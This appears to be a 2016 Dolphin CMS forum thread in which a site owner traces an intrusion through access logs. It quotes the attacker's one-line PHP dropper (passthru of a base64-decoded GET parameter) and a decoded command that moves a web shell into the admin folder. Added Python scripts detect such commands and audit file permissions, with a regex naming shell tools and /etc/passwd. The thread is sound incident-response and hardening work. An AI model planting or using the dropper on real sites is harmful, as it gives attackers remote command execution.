Hacking via administration/modules.php

One of my websites was down this morning and I was able to find the reason: someone edited my /inc/admin.inc.php file and entered a ")" that produced a blank site because PHP threw an error on that.

I found two files in my /tmp folder, called a.php and admin.inc.php (which was the original, unmodified one).

In the /administration folder there was a file called wa.php, which is a filemanager in one PHP file.

So, how was that possible?

After having a look at my server logs I saw that someone did a POST request to /administration/modules.php. Right after that he/she executed the a.php file in the /tmp folder with a URL query.


[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"


The content of the a.php file is something like "passthru(base64_decode($_GET['a']));"

After base64_decode, the query parameter "a" is something like "mv wa.php ../administration/wa.php"


Now he/she was able to execute the wa.php file and change every file inside the Dolphin installation. Lucky me that he/she only changed the admin.inc.php file to bring my site down.


[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"


Does anyone have an idea why this person was able to upload the files to the /tmp folder, and how we can prevent those guys from doing this again?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 31 Oct 2016
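The two log lines above are the whole attack chain in miniature: a dropper in a writable upload directory, driven by a base64-encoded shell command in a query parameter. The following is an added example (not code from the original post or from Dolphin) that scans access-log lines for exactly that pattern: it decodes base64-looking query values and flags the ones that turn into shell commands, and it also flags any .php executed from an upload directory. SAMPLE_LOG is constructed from the lines quoted in the post plus two benign requests; the log layout (no client host/ident fields) and the UPLOAD_DIRS list are assumptions.

```python
"""Decode base64-carried commands in web server access logs.

Added example (not code from the original post): scans access-log lines for
query parameters that base64-decode to shell commands, which is how the
/tmp/a.php dropper described in the thread was driven.  SAMPLE_LOG is
constructed from the lines quoted in the post plus two benign requests; the
log layout (no client host/ident fields) and UPLOAD_DIRS are assumptions.
"""
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the three lines from the post plus two benign requests.
SAMPLE_LOG = """\
[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"
[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"
[30/Oct/2016:20:48:10 +0000] "GET /index.php?page=aGVsbG8= HTTP/1.0" 200 5120 "-" "-"
[30/Oct/2016:20:49:00 +0000] "GET /index.php?page=profile HTTP/1.0" 200 5120 "-" "-"
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Directories that should only ever hold uploads, never executable PHP (assumption).
UPLOAD_DIRS = ("/tmp/",)

# Shell verbs and path tricks that have no business inside a decoded query value.
# Heuristic: short words such as "id" or "sh" can false-positive on ordinary text.
SUSPICIOUS = re.compile(
    r"(?:^|[\s;|&`$(])(?:mv|cp|rm|wget|curl|chmod|chown|cat|sh|bash|ls|find|id|whoami|uname)\b"
    r"|\.\./|/etc/passwd"
)


def decode_b64(value):
    """Return the decoded text if value is base64 of printable UTF-8, else None."""
    # Access logs keep the raw query, so a '+' is base64 alphabet, not an encoded
    # space; parse_qsl has already turned it into ' ', so put it back.
    value = value.strip().replace(" ", "+")
    if len(value) < 8:  # too short to carry a command; cuts noise
        return None
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.isprintable() else None


def analyze_line(line):
    """Return a list of findings for one access-log line (empty for benign lines)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    base = {"ts": m.group("ts"), "method": m.group("method"), "path": url.path}
    findings = []
    if url.path.startswith(UPLOAD_DIRS) and url.path.endswith(".php"):
        findings.append(dict(base, reason="php executed from upload dir", decoded=None))
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = decode_b64(value)
        if decoded is not None and SUSPICIOUS.search(decoded):
            findings.append(dict(base, reason="base64 shell command", param=name, decoded=decoded))
    return findings


def scan_log(text):
    """Run analyze_line over every line of a log and return all findings in order."""
    return [f for line in text.splitlines() for f in analyze_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        extra = f" -> {f['decoded']!r}" if f.get("decoded") else ""
        print(f"{f['ts']} {f['method']} {f['path']}: {f['reason']}{extra}")
```

Run against the sample, the dropper request is reported twice (once for living under /tmp/, once for the decoded "mv wa.php ../administration/wa.php"), while the two benign index.php requests, including the one whose parameter is harmless base64, produce nothing. On a real server, feed it the access log with the real client-host fields stripped or extend LINE_RE to skip them.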

AlexT? Andrew?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

I don't know, but when they (guess) know your password everything is possible.
I can't code, so if there is a leak somewhere, ....

http://www.busimatch.club ( The most exclusive business club)
Quote · 1 Nov 2016

No, they had no password at all ...

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

Interesting...


You should also not run your php-fpm/apache as the user with write permission on all these sites' files :/


If you don't have any problem with sharing that log file, can you upload the whole log file somewhere, with the log for at least a few hours around that request that's executing the script?

If you can upload error log as well that would be nice.


EDIT: ok.... I have found part of the big issue, wondering where to report security issues...

so much to do....
Quote · 1 Nov 2016

And I reproduced the file uploading exploit/issue; it was a bit too easy.


Off to deleting everyone's Dolphin sites

so much to do....
Quote · 1 Nov 2016

So this is an issue with Dolphin, right?

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016


So this is an issue with Dolphin, right?

yup


Though, it's no excuse for not configuring your server right; remember layered security (or something like that)... PHP should not be able to modify/write to your site's files under any condition. Lock 'em down and only allow write to folders which need them for file uploads ;)


EDIT: BTW, some advice for you, since it seems some guy is onto your site: you might want to change your admin profile ID from "1" to anything random as a temporary solution to throw this guy off. I have reported the exploits to uno@b....com already.

so much to do....
Quote · 1 Nov 2016
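The layered-security advice in the reply above is easy to state and easy to get wrong, because a directory the PHP worker can write to is as dangerous as a writable file: a writable /administration is what lets a wa.php be moved in, and a writable /inc/admin.inc.php is what lets it be edited. The following is an added example (not code from the original post or from Dolphin) that walks a document root and reports everything a given PHP uid/gid could write outside an allow-list of upload directories. build_demo_site() builds a constructed stand-in for the paths named in the thread; the PHP uid/gid and the allow-list (just "tmp" here, a real install has more upload folders) are assumptions supplied by the caller.

```python
"""Find files and directories a PHP worker could modify inside a site root.

Added example, not code from the original post or from Dolphin.  It
implements the advice in the thread: the web server user must not be able to
write anywhere under the document root except the directories that take
uploads.  build_demo_site() is a constructed stand-in for the paths named in
the thread; the PHP uid/gid and the allow-list are assumptions.
"""
import os
import stat
import tempfile


def writable_by_php(st, php_uid, php_gid):
    """True if a process running as php_uid/php_gid could write to this inode."""
    mode = st.st_mode
    if st.st_uid == php_uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == php_gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def _under(rel, allowed):
    """True if docroot-relative path rel is one of, or inside, the allowed dirs."""
    return any(rel == a or rel.startswith(a + os.sep) for a in allowed)


def audit(docroot, php_uid, php_gid, allowed_write_dirs):
    """Return sorted docroot-relative paths PHP could write outside allowed_write_dirs.

    Directories are reported as well as files: a writable directory lets PHP
    create or move a web shell into it, a writable file lets PHP edit it.
    """
    allowed = [os.path.normpath(d) for d in allowed_write_dirs]
    violations = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot)
            if _under(rel, allowed):
                continue
            if writable_by_php(os.lstat(full), php_uid, php_gid):
                violations.append(rel)
    return sorted(violations)


def build_demo_site(root):
    """Constructed layout (assumption) mirroring the paths in the thread.

    /administration and /tmp are deliberately world-writable and
    /inc/admin.inc.php deliberately 0666, the kind of sloppy install the
    thread is warning about.
    """
    site = os.path.join(root, "dolphin")
    for d, mode in (("inc", 0o755), ("administration", 0o777), ("tmp", 0o777)):
        os.makedirs(os.path.join(site, d))
        os.chmod(os.path.join(site, d), mode)
    for f, mode in (("inc/admin.inc.php", 0o666),
                    ("administration/modules.php", 0o644),
                    ("index.php", 0o644)):
        path = os.path.join(site, f)
        with open(path, "w") as fh:
            fh.write("<?php\n")
        os.chmod(path, mode)
    os.chmod(site, 0o755)
    return site


def run_demo(allowed_write_dirs=("tmp",)):
    """Audit the constructed tree as a PHP user that owns none of its files."""
    with tempfile.TemporaryDirectory() as root:
        site = build_demo_site(root)
        owner = os.stat(site)
        # Hypothetical www user: any uid/gid other than the deploying user's,
        # so only the group/other permission bits can grant it write access.
        php_uid, php_gid = owner.st_uid + 1, owner.st_gid + 1
        return audit(site, php_uid, php_gid, allowed_write_dirs)


if __name__ == "__main__":
    for rel in run_demo():
        print("PHP can write:", rel)
```

On the constructed tree the audit reports "administration" (a directory a web shell could be moved into) and "inc/admin.inc.php" (the file that was edited in the thread), and nothing under tmp because that is the allowed upload folder. For a real site, call audit() with the document root, the uid/gid of the php-fpm or apache worker, and the list of folders the application genuinely needs to write to, then fix ownership and modes on everything it prints.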

Thanks!

http://www.boonex.com/market/posts/paansystems - your resource for Dolphin Pro
Quote · 1 Nov 2016

https://www.boonex.com/trac/dolphin/wiki/7.3.2-7.3.3

Quote · 2 Nov 2016

Thank you @TruckingSpace for the link.

We've just released update with security fix.

File uploading problem isn't reproducible without another vulnerability, which was just fixed. 

Rules → http://www.boonex.com/terms
Quote · 2 Nov 2016